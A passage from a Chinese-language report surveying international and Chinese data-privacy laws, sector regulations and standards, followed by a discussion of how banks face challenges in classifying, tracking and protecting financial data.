处理者与数据控制者是不同主体,代表数据控制者处理个人数据。共同控制是指多个参与主体共同决定数据处理 的目的与方式。 度敏感数据访问必须可审计等。我国国家推荐性标准《信息安全 技术 个人信息安全影响评估指南》(GB/T 39335-2020),为 GDPR 下 DPIA 映射至国内个人信息安全影响评估(PIA)工作的参考依 据。 (d)催生“数据保护官”、“数据隐私官”等专职岗位/资 质认证。企业需要建立可问责的数据保护责任, 通过数据全生命 周期的隐私保护设计来实现主动/预先管控,而非事后补救,这 就是主动合规的概念。 (e)明确自然人的数据权利。数据主体权益保护将作为默 认设置, 目前美国只有 4%的 iOS 用户在苹果隐私新政后允许应 用程序跟踪他们。 (f)自然人数据权利可申请司法救济。在 GDPR 项下, 当数 据控制者或者处理者违反相关规定,未遵守数据处理的基本原则 和合法事由的规定, 对数据主体的权利造成损害时, 数据主体有 权直接向监管机构进行投诉,监管机构可决定向其提供司法救济 渠道,以及是否对违规主体进行行政处罚。 2.主要国家相关法律 2020 年,世界各地围绕数据隐私立法出现了一些重大进展, 疫情引发的“新常态”带来了围绕数据隐私的新担忧, 全球已有 130 个国家进行了数据隐私立法,严格程度趋同于 GDPR。无论是 数字化的联系追踪还是社交距离的执行, 无论是健康的数字化还 是网络购物, 无论是在家办公还是在线教育, 流行病引发的数字 化加速, 都在不断地将我们推向数字领域,这使得在 2021 年制 定严格的数据隐私法的理由更加充分。 美国: 2018 年 6 月 28 日, 加州立法机构通过了《2018 年加 州消费者隐私法案》(CCPA),该法案让消费者对企业收集的个 人信息有了更多的控制权, 并在 2020 年 1 月 1 日生效。 2020 年 11 月,通过了《加州隐私权利法案》(CPRA),并于 2023 年 1 月 1 日生效, 该法案对按照 GDPR 要求对 CCPA 进行了补充, 除了 为更多的消费者权利和新的消费者个人信息类别让路外, 还设立 了一个新的隐私执行机构。 巴西:《一般数据保护法》(Lei Geral de Proteo de Dados Pessoais,LGPD)于 2020 年 9 月 16 日生效。政府还批准成立一 个国家级的数据保护机构--Autoridade Nacional de Proteo de Dados(ANDP)--将负责执行 LGPD。ANDP 的建立是颁布法律的重要 举措, 使透明度变得至关重要。LGPD 将个人数据持有者的同意和 他/她的访问权置于中心位置,并要求处理数据的组织在巴西建 立处理个人数据的法律基础, 并遵守跨境数据传输限制, 企业还 必须提供详细的隐私声明和数据泄露通知的更新。 加拿大:2020 年 11 月 17 日,加拿大政府提出了 C-11 法案, 即众所周知的《数字宪章实施法》(DCIA Digital Charter Information Act),该法案将使北美国家对其数据隐私政策进 行修订。该法案的目的和目标将与全球其他数据隐私法规(例如 GDPR 和 CCPA)保持一致。例如, 公司将面临最严重罪行的罚款, 最高可达全球收入的 5%或 2500 万美元(以较高者为准) 。 新西兰: 《隐私法》于 2020 年 12 月 1 日生效, 取代了 1993 年《隐私法》。新法适用于在新西兰境内“开展业务”过程中收 集个人信息的境内与境外组织, 并要求收集个人数据的企业在发 生隐私泄露的情况下, 必须通知受影响的个人以及隐私专员办公 室(OPC),否则每次违规将面临高达 1 万新西兰元的重罚。OPC 负责帮助组织和企业了解和应对与跨境转移新西兰境内收集的 个人数据相关的新义务。使用离岸云提供商或其他第三方来存储 或处理数据, 只要第三方不将该信息用于自己的目的, 就不会被 视为披露。 新加坡: 2020 年,新加坡议会通过了对《个人数据保护法》 (PDPA)修正案。修正案赋予新加坡个人数据保护委员会更大的 执法权, 对违反法律的行为设置新的惩罚措施, 赋予公民新的数 据主体权利, 并在个人数据的使用上提供更明确的规定, 以促进 创新。即 PDPA 修正案既加强了对消费者的保护, 也支持企业创 新以及合法合理地利用个人数据。 PDPA 的修正要点如下: a) 加强组织问责制; b) 完善框架, 助于在必要时达成有效同意; c) 强化个人对其数据享有的权利; d) 增加处罚力度。 3.欧洲数字经济的相关法律法规 近年来, 欧盟一方面高度重视个人数据隐私、垄断规则、数 据安全等,先后出台《通用数据保护条例》《欧盟非个人数据自 由流通条例》等多项文件加强数据安全管理。与此同时, 欧盟推 出多项法案, 在数据隐私保护下推动数字经济发展, 加快数字化 转型进程。2020 年 2 月, 欧盟委员会发布《塑造欧洲数字未来》 32(Shaping Europe's digital future), 《欧洲数据战略》 (A European strategy for data)33和《欧洲人工智能白皮书》(White Paper on Artificial Intelligence: a European approach to excellence and trust)等多份文件,涵盖网络安全、关键基础 设施、数字教育和单一数据市场等各个方面, 形成了欧洲新的数 字转型战略。作为数字战略的一部分, 2020 年 12 月 15 日,欧 委会发布了具有里程碑意义“数字服务法案包(the Digital Services Act package)”,包括《数据治理法》 (The Digital Services Act)34 《数字服务法》(the DigitalServices Act)35 和《数字市场法》(the Digital Markets Act)36 ,以升级欧盟 境内数字服务规制规则。 《欧洲数据战略》是数据的确权、市场化、资本化与跨国数 据治理的基石, 再次明确了“数据是自然人权的一部分, 是财产 权的一类”,作为数据采集、交换与交易的基石公理。指导欧盟 32 https://digital-strategy.ec.europa.eu/en/policies/data-governance-act 33 https://digital-strategy.ec.europa.eu/en/policies/strategy-data 34 The Digital Services Act: ensuring a safe and accountable online environment | European Commission (europa.eu) 35 The Digital Markets Act: ensuring fair and open digital markets | European Commission (europa.eu) 36 The Digital Markets Act: ensuring fair and open digital markets | European Commission (europa.eu) 《数据治理法》《数字市场法》《数字服务法》形成完整数据经 济领域的跨国共用法规与愿景协同。 欧盟《数据治理法》, 作为数据创新的强大引擎,该法案增 加了对数据共享的信任, 在战略领域建立和发展欧洲共同的数据 空间,促进跨部门/跨国数据共享,利用数据的潜力为欧洲公民 和企业谋福利。欧盟《数字市场法》规范了“守门人”以确保数 字经济的公平竞争力与《欧洲数字战略》 一致,《数字服务法》 规范数字中介机构、明确保护公民的基本权利为建立真正的欧洲 互联网服务治理体系提出的基础性建议。 (二)国内数据保护政策和法律 1.法律法规 随着信息技术和人类生产生活交汇融合, 各类数据迅猛增长、 海量聚集,对经济发展、社会治理、人民生活都产生了重大而深 刻的影响。数据安全已成为事关国家安全与经济社会发展的重大 问题。党的十九大报告提出, 推动互联网、大数据、人工智能和 实体经济深度融合。党的十九届四中全会决定明确将数据作为新 的生产要素。数据安全相关法律法规建设已成为大数据发展的必 然趋势, 我国近几年发布了一系列大数据产业发展和安全保护相 关的法律法规。 2013 年 10 月 25 日,第十二届全国人民代表大会常务委员 会第五次会议对《中华人民共和国消费者权益保护法》第二次修 正。第二十九条明确了经营者及其工作人员对收集的消费者个人 信息必须严格保密, 不得泄露、出售或者非法向他人提供。经营 者应当采取技术措施和其他必要措施, 确保信息安全, 防止消费 者个人信息泄露、丢失37。 2015 年 7 月 1 日,第十二届全国人民代表大会常务委员会 第十五次会议通过《中华人民共和国国家安全法》, 其中第二十 五条明确提出我国要“实现网络和信息核心技术、关键基础设施 和重要领域信息系统及数据的安全可控” 38。 2016 年 11 月, 第十二届全国人民代表大会常务委员会第二 十四次会议通过《中华人民共和国网络安全法》为了保障网络安 全,维护网络空间主权和国家安全、社会公共利益,保护公民、 法人和其他组织的合法权益, 促进经济社会信息化健康发展, 制 定本法39。 2019 年 1 月 1 日起实施的《中华人民共和国电子商务法》, 为了保障电子商务各方主体的合法权益, 规范电子商务行为, 维 护市场秩序,促进电子商务持续健康发展40。 2020 年 1 月 1 日起实施的《中华人民共和国密码法》,是 为了规范密码应用和管理,促进密码事业发展, 保障网络与信息 37 中华人民共和国消费者权益保护法 http://www.npc.gov.cn/wxzl/gongbao/2014-01/02/content_1823351.htm 38 中华人民共和国国家安全法 http://www.npc.gov.cn/npc/c10134/201507/5232f27b80084e1e869500b57ecc35d6.shtml 39 中华人民共和国网络安全法 http://www.npc.gov.cn/npc/c30834/201611/270b43e8b35e4f7ea98502b6f0e26f8a.shtml 40 中华人民共和国电子商务法 http://www.npc.gov.cn/npc/c30834/201808/5f7ac8879fa44f2aa0d52626757371bf.shtml 安全, 维护国家安全和社会公共利益, 保护公民、法人和其他组 织的合法权益, 制定的法律41。 2020 年 5 月 28 日,十三届全国人大三次会议表决通过的 《中华人民共和国民法典》,延续了《中华人民共和国民法总则》 第 111 条关于自然人个人信息保护的一般规定, 并于人格权编中 专章探讨民事主体的“隐私权和个人信息保护”,明确规定了隐 私权与个人信息保护的基本定义、保护原则以及基本权利义务框 架。这不仅表明立法者关注网络隐私安全、强化个人信息保护的 立场, 同时在基本法律层面, 为我国未来构建科学完善的个人信 息保护法律体系奠定基础42。 2021 年 6 月 10 日, 第十三届全国人民代表大会常务委员会 第二十九次会议通过《中华人民共和国数据安全法》, 是为了规 范数据处理活动,保障数据安全,促进数据开发利用,保护个人、 组织的合法权益,维护国家主权、安全和发展利益, 制定的法律 43 。 2021 年 8 月 20 日, 第十三届全国人民代表大会常务委员会 第三十次会议通过发布的《中华人民共和国个人信息保护法》, 为了保护个人信息权益, 规范个人信息处理活动,促进个人信息 合理利用。《中华人民共和国个人信息保护法》确立了个人信息 41 中华人民共和国密码法 http://www.npc.gov.cn/npc/c30834/201910/6f7be7dd5ae5459a8de8baf36296bc74.shtml 42 《民法典》视角下隐私权与个人信息保护 http://www.acla.org.cn/article/page/detailById/29693 43 中华人民共和国数据安全法 http://www.npc.gov.cn/npc/c30834/202106/7c9af12f51334a73b56d7938f99a788a.shtml 处理应遵循的原则, 强调处理个人信息应当遵循合法、正当、必 要和诚信原则,具有明确、合理的目的并与处理目的直接相关, 采取对个人权益影响最小的方式,限于实现处理目的的最小范围, 公开处理规则, 保证信息质量, 采取安全保护措施等, 本法将于 2021 年 11 月 1 日起施行44。 在《中华人民共和国个人信息保护法》出台之前, 《中华人 民共和国网络安全法》《中华人民共和国数据安全法》和《中华 人民共和国国家安全法》从 2015 年开始陆续出台并实施。这几 部法律既不是孤立的, 也不是独立的, 而是以国家总体安全观为 指引, 以《中华人民共和国国家安全法》为龙头的一个有机的法 律体系。通过《中华人民共和国国家安全法》在内的这四部法律 的主要内容和结构, 可以看到“安全”、“网络”、“数据”和 “个人信息”是这四部法律共同的关键词,是一个有机整体。这 四部法律的立法宗旨都是为了维护国家安全、网络安全、数据安 全和保护个人信息权益45。 2.行业制度规范 我国的互联网, 在国家大力倡导和积极推动下, 在经济建设 和各项事业中得到日益广泛的应用, 使人们的生产、工作、学习 和生活方式已经开始并将继续发生深刻的变化, 对于加快我国国 民经济、科学技术的发展和社会服务信息化进程具有重要作用。 44 全国人大法工委权威解读:个人信息保护法十大亮点 https://mp.weixin.qq.com/s/ai0UsUieSCgEYYJ9wH_Yjg 中华人民共和国个人信息保护法: http://www.npc.gov.cn/npc/c30834/202108/a8c4e3672c74491a80b53a172bb753fe.shtml 45 时建中:我国网络与数据安全及个人信息保护法律制度 https://www.sohu.com/a/487506142_121181007 同时, 为了保障数据信息安全问题, 我国各行业也发布了一些数 据安全保护相关的行业制度规范。 2019 年 11 月发布的《App 违法违规收集使用个人信息行为 认定方法》46 ,为监督管理部门认定 App 违法违规收集使用个人 信息行为提供参考,为 App 运营者自查自纠和网民社会监督提供 指引。 2020 年 4 月, 中共中央、国务院印发《关于构建更加完善的 要素市场化配置体制机制的意见》,将数据作为与土地、劳动力、 资本、技术并列的要素之一,提出要加快培育数据要素市场, 具 体包含推进政府数据开放共享、提升社会数据资源价值、加强数 据资源整合和安全保护三个方面。 2020 年 6 月,为了确保关键信息基础设施供应链安全,维 护国家安全, 国家互联网信息办公室发布实施《网络安全审查办 法》, 2021 年 7 月, 发布关于《网络安全审查办法(修订草案征 求意见稿)》 47公开征求意见的通知。 2020 年 9 月,中国人民银行发布《中国人民银行金融消费 者权益保护实施办法》, 其中, 第三章涉及“消费者金融信息保 护”。为了保护金融消费者合法权益, 规范金融机构提供金融产 46 关于印发《App 违法违规收集使用个人信息行为认定方法》的通知 http://www.cac.gov.cn/2019- 12/27/c_1578986455686625.htm 47 国家互联网信息办公室关于《网络安全审查办法(修订草案征求意见稿)》公开征求意见的通知 http://www.cac.gov.cn/2021-07/10/c_1627503724456684.htm 品和服务的行为,维护公平、公正的市场环境, 促进金融市场健 康稳定运行48。 2021 年 1 月发布的《互联网用户公众账号信息服务管理规 定》, 为了规范互联网用户公众账号信息服务, 维护国家安全和 公共利益,保护公民、法人和其他组织的合法权益49。 2021 年 1 月, 原银保监会、中国人民银行发布《关于规范商 业银行通过互联网开展个人存款业务有关事项的通知》 50 ,为了 加强对商业银行通过互联网开展个人存款业务的监督管理,维护 市场秩序,防范金融风险,保护消费者合法权益,有利于商业银 行合规稳健经营,对于弥补制度短板、防范金融风险具有积极意 义。 2021 年 1 月, 原银保监会发布《监管数据安全管理办法(试 行)》, 为规范原银保监会监管数据安全管理工作, 提高监管数 据安全保护能力,防范监管数据安全风险51。 2021 年 3 月, 为贯彻落实《中华人民共和国网络安全法》关 于“网络运营者收集、使用个人信息, 应当遵循合法、正当、必 要的原则”“网络运营者不得收集与其提供的服务无关的个人信 息”等规定, 国家互联网信息办公室、工业和信息化部、公安部、 48 中国人民银行金融消费者权益保护实施办法 http://www.pbc.gov.cn/tiaofasi/144941/144957/4099060/index.html 49 互联网用户公众账号信息服务管理规定 http://www.cac.gov.cn/2021-01/22/c_1612887880656609.htm 50 原银保监会 中国人民银行发布《关于规范商业银行通过互联网开展个人存款业务有关事项的通知》 http://www.cbirc.gov.cn/cn/view/pages/ItemDetail.html?docId=960017&itemId=917&generaltype=0 51 原银保监会发布《监管数据安全管理办法(试行)》 http://www.cbirc.gov.cn/cn/view/pages/ItemDetail.html?docId=998025&itemId=915&generaltype=0 国家市场监督管理总局联合制定了《常见类型移动互联网应用程 序必要个人信息范围规定》,明确移动互联网应用程序(App) 运营者不得因用户不同意收集非必要个人信息, 而拒绝用户使用 App 基本功能服务52。 2021 年 4 月,国务院第 133 次常务会议通过并公布《关键 信息基础设施安全保护条例》, 本条例根据《中华人民共和国网 络安全法》制定,为了保障关键信息基础设施安全, 维护网络安 全。 2021 年 9 月, 中国人民银行 2021 年第 9 次行务会议审议通 过并发布《征信业务管理办法》(中国人民银行令〔2021〕第 4 号)53,为了规范征信业务及其相关活动,保护信息主体合法权 益, 促进征信业健康发展,推进社会信用体系建设, 根据《中华 人民共和国中国人民银行法》《中华人民共和国个人信息保护法》 《征信业管理条例》等法律法规,制定本办法并于 2022 年 1 月 1 日起施行。 (三)国内相关标准 1.国家标准 2019 年 5 月发布的《智能交通 数据安全服务》(GB/T 37373- 2019): 标准规定了智能运输系统安全支撑平台和数据安全服务 52 关于印发《常见类型移动互联网应用程序必要个人信息范围规定》的通知 http://www.cac.gov.cn/2021- 03/22/c_1617990997054277.htm 53 中国人民银行令〔2021〕第 4 号(征信业务管理办法) http://www.pbc.gov.cn/tiaofasi/144941/144957/4354378/index.html 内容。标准适用于智能运输系统实现基于密码技术的数据安全服 务。 2019 年 8 月发布的《信息安全技术 数据安全能力成熟度模 型》(GB/T 37988-2019):标准给出了组织数据安全能力的成 熟度模型架构, 规定了数据采集安全、数据传输安全、数据存储 安全、数据处理安全、数据交换安全、数据销毁安全、通用安全 的成熟度等级要求。标准适用于对组织数据安全能力进行评估, 也可作为组织开展数据安全能力建设时的依据。 2019 年 8 月发布的《信息安全技术 数据交易服务安全要求》 (GB/T 37932-2019):标准规定了通过数据交易服务机构进行 数据交易服务的安全要求,包括数据交易参与方、交易对象和交 易过程的安全要求。标准适用于数据交易服务机构进行安全自评 估,也可供第三方测评机构对数据交易服务机构进行安全评估时 参考。 2019 年 8 月发布的《信息安全技术 个人信息去标识化指南》 (GB/T 37694-2019):标准描述了个人信息去标识化的目标和 原则, 提出了去标识化过程和管理措施。标准针对微数据提供具 体的个人信息去标识化指导,适用于组织开展个人信息去标识化 工作, 也适用于网络安全相关主管部门、第三方评估机构等组织 开展个人信息安全监督管理、评估等工作。 2019 年 8 月发布的《信息安全技术 大数据安全管理指南》 (GB/T37073-2019): 标准提出了大数据安全管理基本原则,规 定了大数据安全需求、数据分类分级、大数据活动的安全要求、 评估大数据安全风险。标准适用于各类组织进行数据安全管理, 也可供第三方评估机构参考。 2020 年 3 月发布的《信息安全技术 个人信息安全规范》 (GB/T 35273-2020):标准规定了开展收集、存储、使用、共 享、转让、公开披露、删除等个人信息处理活动应遵循的原则和 安全要求。标准适用于规范各类组织的个人信息处理活动,也适 用于主管监管部门、第三方评估机构等组织对个人信息处理活动 进行监督、管理和评估。 2020 年 11 月发布的《信息安全技术 个人信息安全影响评 估指南》(GB/T 39335-2020): 标准规定了个人信息安全影响 评估的基本原理、实施流程。标准适用于各类组织自行开展个人 信息安全影响评估工作, 同时可为主管监管部门、第三方测评机 构等组织开展个人信息安全监督、检查、评估等工作提供参考。 2020 年 11 月发布的《信息安全技术 政务信息共享 数据安 全技术要求》(GB/T 39477-2020):标准提出了政务信息共享 数据安全要求技术框架, 规定了政务信息共享过程中共享数据准 备, 共享数据交换、共享数据使用阶段的数据安全技术要求以及 相关基础设施的安全技术要求。标准适用于指导各级政务信息共 享交换平台数据安全体系建设, 规范各级政务部门使用政务信息 共享交换平台交换非涉及国家秘密数据安全保障工作。 2020 年 12 月发布的《信息安全技术 健康医疗数据安全指 南》 (GB/T 39725-2020):标准给出了健康医疗数据控制者在 保护健康医疗数据时可采取的安全措施。标准适用于指导健康医 疗数据控制者对健康医疗数据进行安全保护,也可供健康医疗、 网络安全相关主管部门以及第三方评估机构等组织开展健康医 疗数据的安全监督管理与评估等工作时参考。 2021 年, 国家标准《信息安全技术 重要数据识别指南》正 在按程序编制, 征求意见稿已经完成, 即将征求社会意见。标准 正式发布后会为各地区、各部门制定本地区、本部门以及相关行 业、领域的重要数据具体目录提供参考, 为重要数据保护工作提 供支撑。 2.行业标准 (1) 金融行业 以国家标准为基础,近年来中国人民银行会同金融监管部门 组织制定了多项金融行业数据标准。主要的有: 2020 年 2 月发布的《个人金融信息保护技术规范》(JR/T 0171-2020): 标准规定了个人金融信息在收集、传输、存储、使 用、删除、销毁等生命周期各环节的安全防护要求, 从安全技术 和安全管理两个方面,对个人金融信息保护提出了规范性要求。 标准适用于提供金融产品和服务的金融业机构, 并为安全评估机 构开展安全检查与评估工作提供参考。 2020 年 9 月发布的《金融数据安全 数据分类分级指南》 (JR/T 0197-2020):标准给出了金融数据安全分级的目标、原 则和范围,以及数据安全定级的要素、规则和定级过程。标准适 用于金融业机构开展电子数据安全分级工作,并为第三方评估机 构等单位开展数据安全检查与评估工作提供参考。 2020 年 11 月发布的《多方安全计算金融应用技术规范》 (JR/T 0196—2020):标准规定了多方安全计算技术金融应用 的基础要求、安全要求、性能要求等。标准适用于金融机构开展 多方安全计算金融应用的产品设计、软件开发。 2020 年 11 月发布的《金融行业网络安全等级保护实施指引 第 2 部分:基本要求》(JR/T 0071.2—2020): 标准规范了金 融行业网络安全保障框架和不同安全等级对应的安全要求。标准 适用于指导金融机构、测评机构和金融行业网络安全等级保护的 主管部门实施网络安全等级保护工作。 12345 2021 年 2 月发布的《金融业数据能力建设指引》(JR/T 0128- 2021):标准规定了数据战略、数据治理、数据架构、数据规范、 数据保护、数据治理、数据应用、数据生存周期管理能力域划分, 明确了相关能力项, 提出了每个能力项的建设目标和思路。标准 适用于指导金融机构开展金融数据能力建设。 2021 年 4 月发布的《金融数据安全 数据生命周期安全规范》 (JR/T 0223-2021):标准规定了金融数据生命周期安全原则、 防护要求、组织保障要求以及信息系统运维保障要求, 建立覆盖 数据采集、传输、存储、使用、删除及销毁过程的安全框架。标 准适用于指导金融业机构开展电子数据安全防护工作, 并为第三 方测评机构等单位开展数据安全检查与评估工作提供参考。 2021 年,金融行业标准《金融数据安全 数据安全评估规范》 经过草案稿编制、工作组讨论等阶段,已形成标准征求意见稿。 标准规定了金融数据安全评估触发条件、原则、参与方、内容、 流程及方法, 明确了数据安全管理、数据安全保护、数据安全运 维三个主要评估域及其安全评估主要内容和方法。标准适用于金 融业机构开展金融数据安全评估使用, 并为第三方安全评估机构 等单位开展金融数据安全检查与评估工作提供参考。 此外, 金融行业元数据、数据资源目录等数据相关标准正在 制定中。 (2) 其他行业 2020 年 12 月发布的《电信网和互联网数据安全通用要求》 (YD/T 3802-2020): 标准主要适用于在电信服务和互联网信息 服务提供过程中,在公用电信网和互联网网络单元和业务系统中 采集、产生、使用的数据。适用于对电信网和互联网行业中组织 开展的数据处理活动及与数据处理活动相关的平台系统的安全 保护。标准不适用于企业生产经营数据、内部管理数据及企业内 部研发测试数据。 2021 年 5 月发布的《工业互联网数据安全保护要求》(YD/T 3865-2021):标准规定了工业互联网数据安全保护的范围及数 据类型、工业互联网数据重要性分级与安全保护等级划分方法, 规定了低/中/高重要性数据在数据产生、传输、存储、使用、迁 移及销毁阶段的具体安全保护要求。标准适用于工业互联网相关 服务组织或企业开展数据安全保护工作。 2019 年 3 月发布的《信息安全技术 移动智能终端用户数据 存储安全技术要求和测试评价方法》(GA/T 1547-2019):标准 规定了移动智能终端的用户数据存储安全技术要求、测试评价方 法和等级划分要求。标准适用于不同安全等级信息系统中移动智 能终端操作系统及应用程序在用户数据存储安全方面的设计、开 发及检测。 2020 年 4 月发布的《信息安全技术 大数据平台安全管理产 品安全技术要求》(GA/T 1718-2020):标准规定了大数据平台 安全管理产品的安全功能要求、安全保障要求和等级划分要求。 标准适用于大数据平台安全管理产品的设计、开发及检测。 三、金融数据保护治理重要关注领域 (一)分类分级识别与保护 对金融数据开展保护的前提是明确数据保护对象,即对数据 资产进行识别、梳理, 以成本合理、区分重点地对不同类型、不 同等级的金融数据实行差异性保护。金融数据的分类分级与识别 是后续落实技术防护措施、安全管理流程的基础性、必要性、先 决性工作,也是开展金融数据保护治理工作的重点。同时,《网 络安全法》第二十一条也明确了数据主体承担着数据分类分级的 法律责任。根据国家《数据安全法》的要求, 金融机构应当建立 数据分类分级保护制度, 根据数据在经济社会发展中的重要程度, 以及一旦遭到篡改、破坏、泄露或者非法获取、非法利用,对国 家安全、公共利益或者个人、组织合法权益造成的危害程度, 对 数据实行分类分级保护。其中, 对于关系国家安全、国民经济命 脉、重要民生、重大公共利益等数据属于国家核心数据, 应按照 国家相关要求实行更加严格的管理制度。对于金融行业的数据, 其分类可参照行业信息分类规范,数据安全分级可参照已经发布 的《JR/T 0197-2020 金融数据安全 数据安全分级指南》开展, 证券期货业也可参照《JR/T 0158-2018 证券期货业数据分类分 级指引》开展分类分级。 1.金融数据分布特点与安全特点 金融机构的业务数据, 是银行最本质、最核心、最关键的生 产要素,银行业金融机构的数据安全, 除保密、完整、可靠、可 用之外, 也关系到金融行业的资金安全以及大数据时代对数据的 增值分析、利用带来的衍生价值。以下从目前银行业金融机构涉 及数据安全的各业务场景来分析和总结金融数据的分布特点, 以 及面临的重大安全威胁和挑战: (1) 错综复杂的系统和数据如何区分和识别重点? 大型金融机构涉及全国性的用户和业务, 金融相关信息系统 可能多达数百个。各信息系统因业务需要,保存了大量不同类别、 不同敏感级别的数据, 如客户基础信息、业务交易数据、业务产 品数据、企业经营数据、机构数据、员工信息、系统数据等, 数 据流经大量系统、不同节点并进行存储处理, 如总行、分支行网 点,与监管单位、清算支付、第三方支付、银联网联等的接入等, 数据层级多、分布广泛。同时, 业务多元化也带来数据的多元化, 数据之间存在着复杂的逻辑关系, 派生出的标识数据、加密数据、 属性说明数据、验证数据也相应增多, 可谓牵一发而动全身。如 何在分布广、多层级、多元化、海量级的金融数据中区分和识别 重点, 科学、合理、高效、全面地进行数据分类分级, 是金融业 面临的重要难题。 (2) 敏感数据对外应用与提供增加了安全风险,如何管 控? 金融行业机构在互联网金融等方面的业务冲击下,拓展了包 括网页、手机、电话、电视、微信等多种新的银行业务服务渠道, 并通过建立智慧银行、移动展业与客户建立友好互动, 在不同的 渠道和界面上需要展示或提供数据, 如交易的密码、认证的身份 信息, 甚至是认证所需要的证书、生物特征信息等, 这些数据的 传输与展示势必会增加数据泄露风险。同时, 因监管需要上传或 下载数据、同行业务往来共享数据、司法需要提供数据, 如何确 保在合理合法提供的同时,确保提供数据的最少化、安全性、准 确性,也是需要重点考虑的问题。 (3) 海量的数据如何识别并掌握数据的流向和分布? 在进行了海量数据的分类、分级之后, 还需要掌握敏感数据 的流转情况,才能确定系统是否是在受控情况下安全共享与处理 数据。需明确的问题如下:需要保护的数据到底在哪些系统内分 布?最终流向了哪些安全域与边界?是否存在未授权、非法的流 出?是否需要建立敏感数据资产的识别、标识、溯源系统,以便 于随时跟踪敏感数据的流向和分布?是否需要建立对敏感数据 的统一监控和审计措施, 以便于对敏感数据的可疑使用进行跟踪? 掌握了敏感和关键数据的分布与流向, 才能为数据总体管控策略、 数据智能分析与决策提供帮助。 (4) 与监管、同行、合作方多渠道数据交换如何保证安 全? 金融行业业务多元复杂, 面临多头监管, 比如中国人民银行、 原银保监会、公安部等。同时, 需要与同行或者业内金融机构进 行业务合作或接受审计, 比如行业联合组织、清算机构、其他合 作企业, 这些数据的流转监管单位是否有安全标准, 或者对方是 否有特殊数据安全防护要求与接口要求尚未明确,这就需要我们 制定统一的数据安全标准,区分数据级别,并根据对应的管控措 施与各方进行共享、控制,争取满足各方面的安全要求。 (5) 数据多层级、多系统、多角色使用、访问,如何防 止在内部的敏感数据泄露? 首先, 数据在不同等级系统之间进行交互和流转,高密区域 向低密区域可能造成数据的泄露;其次, 业务系统的部署会分布 在总部以及省、地市、县等不同级别, 金融数据在本单位内部涉 及多系统、多层级调用和查询成为普遍情况; 在一个系统内部也 可能有多重角色存在,分别承担着对业务数据不同的管理责任, 尤其是系统管理、数据库管理、业务管理等特权账户, 具有直接 接触和修改数据的权利, 其操作和访问如何进行安全控制尚未明 确, 这些业务场景都会使业务数据的访问、操作和使用面临诸多 风险,需要明确数据分级部署的安全、系统接口和传输的安全, 以及访问控制的安全。同时, 数据还可能被提取出来进行特定分 析或者进行统计汇总和分析, 数据将从线上转移到线下, 如何保 证数据的安全导出和线下利用、保管, 也是数据安全关注的重点 之一。 (6) 大量引进外包与外资服务,如何保证外包与合作过 程中的数据安全与自主可控? 大型金融企业人员编制有限, 为了专业性和成本考虑, 银行 业金融机构需要引入外包服务来对业务信息系统进行开发、建设 和运维,驻场外包人员成为金融数据安全的重要风险敞口。同时, 一些更专业化的服务, 如咨询、审计等, 涉及技术难度与可信度 的问题,需要与国内外大型机构进行合作,因此也会带来财务、 业务战略、数据安全方面的风险。 (7) 对外合作与国际化趋势加剧,数据出境如何保证安 全? 受国际化趋势和国家“走出去”战略影响,我们需要与国外 机构或者合作伙伴进行合作, 如国外的监管单位、国外金融机构 以及本机构在国外设置的分支机构,都可能需要将业务数据流出 境外处理存储, 如何在符合当地监管要求以及国内法律、标准规 范(数据出境)要求的前提下,做好数据的受控传输、使用、存 储,是我们要面临的挑战之一。 (8) 个人信息的保护监管越来越受到重视,如何保证个 人信息的安全, 获得客户信任? 《网络安全法》《个人信息保护法》的出台,《GB/T 35273- 2020 信息安全技术 个人信息安全规范》《JR/T 0171—2020 个 人金融信息保护技术规范》的制定, 进一步把个人信息保护提升 到了新的高度。金融监管层面也发布了一系列保护交易信息和客 户信息的政策要求, 明确“强化工作机制,做好内部防控;完善 技术手段,提高安全水平;优化服务流程,加大宣传力度”,严 防“违法违规查询、获取、使用、泄露、出售客户信息或商业秘 密, 以谋取私利”行为。个人金融信息是特殊类数据, 涉及客户 的隐私权益, 若缺乏有效保护, 可能会使客户的利益受到不法侵 害, 其分类与分级应与金融数据保护进行统一和融合。 以上是金融数据面临的各种挑战,是促成金融数据进行分类 分级识别并加以安全管控的重要驱动力和根因。我们需要在此基 础之上梳理金融数据分布特性、应用特性、安全特性, 从而确定 数据利用方面的安全保障与防护需求, 理清金融数据自身的安全 属性以及与后续治理措施、保护策略的对应和逻辑关系。 2.金融数据识别难点与重点 金融数据在分布特点、价值属性、安全特性等方面与其他行 业数据存在不同,在识别上也存在一定的区别, 具体存在以下识 别难点与重点: (1) 分布广、数据量大、数据结构复杂,导致识别难、 挑战大 金融信息系统用户多、系统多、业务多元化、内部层级多, 面临着多头监管与合作共享。由于数据体量巨大,人工识别难度 大, 企业需要以系统开发时的数据架构与定义为基础, 数据治理 /管理体系为架构,数据管控平台为抓手,建立线上与线下相辅 相成的数据安全防护措施,才能全面对所有数据进行分级分类与 识别。 (2) 线下数据依然是识别与管控的重点 业务部门人员、IT 管理人员、分支机构岗位人员都能从系统 内获取、下载、使用数据,内部办公网、生产运维网、开发测试 网、营业网点、客户服务中心等也会留存大量客户数据、技术数 据和业务统计数据, 通过导出、提取获得的大量敏感数据也是不 可遗漏的识别与保护的重点。业务人员可以依托内网安全管理、 文档安全管理、终端安全管理等方式对相关数据进行有效的安全 管控。 (3) 需要建立规范性的流程和标准 数据的分类分级与识别是专业性的工作, 必须建立统一的标 准, 提供规范、合理、严格的标准和指导,让具体使用人员、操 作人员有法可依、有据可循。 (4) 识别应成为管控的基础和着力点 金融数据的识别不是为了识别而识别, 识别的最终目的是安 全管控与高效应用。具体来讲, 一方面是为了便利, 不能增大数 据架构的复杂度与难度, 不能干扰或降低数据应用的效率和便利 性。另一方面, 金融数据识别应成为安全管控策略与措施的着力 点, 让其能借助分类分级、安全标签、数据溯源等措施, 对数据 进行重点区分、成本合理的防护。 (5) 集中管控、视图化管理是识别的必然结果 随着系统与应用复杂性的增加,传统靠人力盯防单个安全管 理系统或服务器、数据库日志的方法已经被逐步淘汰,网络安全、 数据安全都在朝集中化、 一体化管控的方向迈进,数据安全需要 专门的数据安全管理岗位进行专职管理, 以形成统一的管控体系 与策略, 明确数据到底在哪些系统、边界、接口进行流转,数据 数量级,是否有敏感数据流转等问题,可使用视图化的管理方式, 去直观跟踪重要数据的流向和动态。 (6) 数据资产的常态化运营必然催生专业化数据运维管 控平台 数据是核心生产要素, 日常化流转与使用必然需要常态化运 营, 为了提高运营的效率、可靠性、标准化程度,需要建立定制 化的数据资产运维管控平台, 进行多系统、多渠道的数据资产管 理。 除了实现数据的智能分类和识别功能之外, 也可同步加强数 